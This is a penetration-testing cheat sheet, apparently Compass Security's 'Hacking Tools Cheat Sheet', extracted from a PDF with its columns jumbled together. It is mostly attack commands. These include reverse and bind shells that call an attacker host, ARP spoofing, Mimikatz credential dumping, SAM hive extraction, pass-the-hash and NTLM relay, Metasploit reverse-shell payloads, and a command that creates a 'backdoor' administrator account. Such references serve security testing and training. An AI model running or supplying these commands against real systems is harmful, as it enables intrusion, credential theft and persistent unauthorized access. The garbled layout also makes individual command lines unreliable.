Start TLS Server: Delete ARP cache: Scan for vulnerabilities (script category filter):

Hacking Tools Cheat Sheet # ncat --ssl -l -p 1337--ssl-cert # ip neigh flush all # nmap -n -Pn --script "vuln and safe"
Compass Security, Version 1.0, October 2019 [Link] --ssl-key [Link] Sniff traffic: [Link]/24
Connect to TLS service: # tcpdump [options] [filters] Performance Tuning (1 SYN packet ≈ 60 bytes
Basic Linux Networking Tools # ncat --ssl [Link] 1337 Useful tcpdump options: → 20'000 packets/s ≈ 10 Mbps):
Show IP configuration: Connect to TLS service using openssl: ▪ -i interface: Interface or any for all # nmap -n -Pn --min-rate 20000
[Link]/24
# ip a l # openssl s_client -connect ▪ -n: Disable name and port resolution
Change IP/MAC address:
[Link]:1337 ▪ -A: Print in ASCII Useful nmap options:
# ip link set dev eth0 down Show certificate details: ▪ -XX: Print in hex and ASCII ▪ -n: Disable name and port resolution
# macchanger -m [Link] eth0 # openssl s_client -connect ▪ -w file: Write output PCAP file ▪ -PR: ARP host discovery
# ip link set dev eth0 up [Link]:1337 | openssl x509 -text ▪ -r file: Read PCAP file ▪ -Pn: Disable host discovery
Static IP address configuration: Test TLS server certificate and ciphers: ▪ -sn: Disable port scan (host discovery only)
Useful tcpdump filters:
# ip addr add [Link]/24 dev eth0 # sslyze --regular [Link]:443 ▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ not arp: No ARP packets
DNS lookup: TCP to TLS proxy: ▪ --top-ports 50: Scan 50 top ports
▪ port ftp or port 23: Only port 21 or 23
# socat TCP-LISTEN:2305,fork,reuseaddr ▪ -iL file: Host input file
# dig [Link] ▪ host [Link]: Only from/to host
ssl:[Link] ▪ -oA file: Write output files (3 types)
Reverse DNS lookup: ▪ net [Link]/24: Only from/to hosts in
Online TLS tests: ▪ -sC: Script scan (default scripts)
# dig -x [Link] network
▪ [Link], [Link] ▪ --script <file/category>: Specific scripts
Advanced sniffing using tshark or Wireshark. ▪ -sV: Version detection
Information Gathering
HTTP Tools Sniffing over SSH on a remote host: ▪ -6: IPv6 scan
Find owner/contact of domain or IP address: ssh [Link] tcpdump -w- port not
# whois [Link] Start Python webserver on port 2305: The target can be specified using CIDR notation
ssh | wireshark -k -i -
# python3 -m [Link] 2305 ([Link]/24) or range definitions (10.13-
Get nameservers and test for DNS zone transfer: Search in network traffic:
# dig [Link] ns Perform HTTP Request: 37.5.1-23).
# ngrep -i password
# dig [Link] axfr @[Link] # curl [Link] Fast scan using masscan:
Show HTTP GET requests: # masscan -p80,8000-8100 --rate 20000
Get hostnames from CT logs: Search for Useful curl options: # urlsnarf [Link]/8
%.[Link] on [Link] ▪ -k: Accept untrusted certificates
Show transmitted images: Public internet scan databases:
Or using an nmap script: ▪ -d "foo=bar": HTTP POST data
# driftnet ▪ [Link], [Link]
# nmap -sn -Pn [Link] ▪ -H: "Foo: Bar": HTTP header
--script hostmap-crtsh ▪ -I: Perform HEAD request Network Scanning
▪ -L: Follow redirects Shells
Combine various sources for subdomain enum: ARP Scan:
# amass enum -src -brute -min-for- ▪ -o [Link]: Write output file Start bind shell (on victim):
# nmap -n -sn -PR [Link]/24
recursive 2 -d [Link] ▪ --proxy [Link] Set proxy # ncat -l -p 2305 -e "/bin/bash -i"
Reverse DNS lookup of IP range: Connect to bind shell (on attacker):
Scan for common files/applications/configs:
TCP Tools # nikto -host [Link]
# nmap -sL [Link]/24 # ncat [Link] 2305
Listen on TCP port: Nmap host discovery (ARP, ICMP, SYN 443/tcp, Listen for reverse shell (on attacker):
Enumerate common directory-/filenames:
# ncat -l -p 1337 ACK 80/tcp): # ncat -l -p 23
# gobuster -u [Link] -w
# nmap -sn -n [Link]/24
Connect to TCP port: /usr/share/wordlists/dirb/[Link] Start reverse shell (on victim):
# ncat [Link] 1337 TCP scan (SYN scan = half-open scan): # ncat -e "/bin/bash -i" [Link] 23
Sniffing # nmap -Pn -n -sS -p
22,25,80,443,8080 [Link]/24 Start reverse shell with bash only (on victim):
TLS Tools ARP spoofing: # bash -i &>/dev/tcp/[Link]/42 0>&1
Create self-signed certificate: # arpspoof -t [Link] [Link] List Nmap scripts:
# ls /usr/share/nmap/scripts Upgrade to pseudo terminal:
# openssl req -x509 -newkey rsa:2048 - Or a graphical tool: # python -c 'import pty;
keyout [Link] -out [Link] -nodes - # ettercap -G Scan for EternalBlue vulnerable hosts: [Link]("/bin/bash")'
subj "/CN=[Link]/" # nmap -n -Pn -p 443 --script smb-
Show ARP cache: vuln-ms17-010 [Link]/24
# ip neigh
Vulnerability DBs and Exploits Upgrade to Meterpreter: Add a new local admin: Meterpreter via pass-the-hash:
^Z (Ctrl-Z) C:\> net user backdoor P@ssw0rd23 msf > set payload
Exploit search (local copy of the Exploit-DB): Background session 1? [y/N] y C:\> net localgroup Administrators windows/meterpreter/reverse_tcp
# searchsploit apache > sessions # list sessions backdoor /add msf > set LHOST [Link] # attacker
Show exploit file path and copy it into clipboard: > sessions -u 1 # Upgrade Scan for network shares: msf > set LPORT 443
# searchsploit -p 40142 > sessions 2 # interact with session 2 # [Link] --host-file [Link] - msf > set RHOST [Link] # victim
meterpreter > sysinfo # use it msf > set SMBPass 01[...]03:01[...]03
Online vulnerability and exploit databases: u Administrator -p PasswordOrHash
Upload / download files: msf > exploit
▪ [Link], [Link], meterpreter > shell
[Link] meterpreter > upload [Link] Windows Credentials Gathering
meterpreter > download c:\[Link] C:\WINDOWS\system32>
Start Mimikatz and create log file:
Cracking Port forwarding to localhost: C:\>[Link] NTLM Relay
> portfwd add -l 2323 -p 3389 -r # privilege::debug
Try SSH passwords from a wordlist: [Link] Vulnerable if message_signing: disabled:
# ncrack -p 22 --user root -P # log C:\tmp\[Link]
# nmap -n -Pn -p 445 --script smb-
./[Link] [Link]/24 Pivoting through existing Meterpreter session: Read [Link] process dump: security-mode [Link]/24
> use post/multi/manage/autoroute # sekurlsa::minidump [Link]
Determine hash type: > set session 2 # meterpreter session Disable SMB and HTTP in [Link] and
# hashid 869d[...]bd88 > run The [Link] process can be dumped using start Responder:
Show example hash types for hashcat: > route the task manager or procdump. # ./[Link] -I eth0
# hashcat --example-hashes SOCKS via Meterpreter (requires autoroute): Show passwords/hashes of logged in users: NTLM Relay to target and extract SAM file:
Crack hashes (e.g. no. 5600 for NTLM type): > use auxiliary/server/socks4a # sekurlsa::logonpasswords # ./[Link] -smb2support -t
# hashcat -m 5600 -a 0 [Link] > set SRVPORT 8080 Backup SYSTEM & SAM hive: smb://[Link]
[Link] > run C:\>reg save HKLM\SYSTEM [Link] NTLM Relay using socks proxy:
Crack hashes using John the Ripper: Configure ProxyChains: C:\>reg save HKLM\SAM [Link] # ./[Link] -tf [Link]
# john [Link] # vi /etc/[Link] Extract hashes using Mimikatz: -smb2support -socks
[...] # lsadump::sam /system:[Link] Configure ProxyChains:
Metasploit Framework socks4 [Link] 1080 /sam:[Link] # vi /etc/[Link]
Start Metasploit: Connect through SOCKS proxy: [...]
# msfconsole # proxychains ncat [Link] 1337 Pass-the-Hash socks4 [Link] 1080

Search exploit: Impacket library on GitHub Access files via SOCKS proxy:
Linux Privilege Escalation "SecureAuthCorp/impacket". Compiled for Win- # proxychains smbclient -m smb3
> search eternalblue
Use exploit: Enumerate local information (-t for more tests): dows on GitHub: "maaaaz/impacket-examples- '\\[Link]\C$' -W pc05 -U
Administrator%invalidPwd
msf > use exploit/windows/smb/ms17_… # curl -o /tmp/linenum windows".
[Link]
Configure exploit: Shell via pass-the-hash: Active Directory
otuser/LinEnum/master/[Link]
msf exploit(…) > show options # bash /tmp/linenum -r /tmp/report # ./[Link] -hashes
:011AD41795657A8ED80AB3FF6F078D03 Copy content from SharpHound.ps1 from
msf exploit(…) > set TARGET [Link]
Other hardening checks: Administrator@[Link] GitHub "BloodHoundAD/BloodHound" into a
Run exploit: # lynis audit system PowerShell and import the ZIP into Bloodhound
msf exploit(…) > exploit Over a subnet and extract SAM file:
Use sudo/SUID/capabilities/etc. exploits from # crackmapexec -u Administrator -H to find the paths for privilege escalation.
Generate reverse shell (WAR): [Link]. :011AD41795657A8ED80AB3FF6F078D03 Download PingCastle from [Link] and
# msfvenom -p [Link] --sam generate Report.
java/jsp_shell_reverse_tcp LHOST=<your Windows Privilege Escalation
ip address> LPORT=443 -f war > [Link] Browse shares via pass-the-hash:
More Online References
Copy PowerUp.ps1 from GitHub "Pow- # ./[Link]
Reverse shell listener: [Link]/Administrator@[Link] - ▪ GitHub "swisskyrepo/PayloadsAllTheThings"
> use exploit/multi/handler erShellMafia/PowerSploit" into PowerShell to
bypass ExecutionPolicy and execute Invoke-
hashes 01[...]03:01[...]03 ▪ GitHub "danielmiessler/SecLists
> set payload
AllChecks. Use the abuse functions. RDP via pass-the-hash: ▪ GitHub "enaqx/awesome-pentest"
linux/x64/shell_reverse_tcp
> set LHOST [Link] # attacker # xfreerdp /u:user /d:domain /pth:
> set LPORT 443 011AD41795657A8ED80AB3FF6F078D03
> exploit /v:[Link]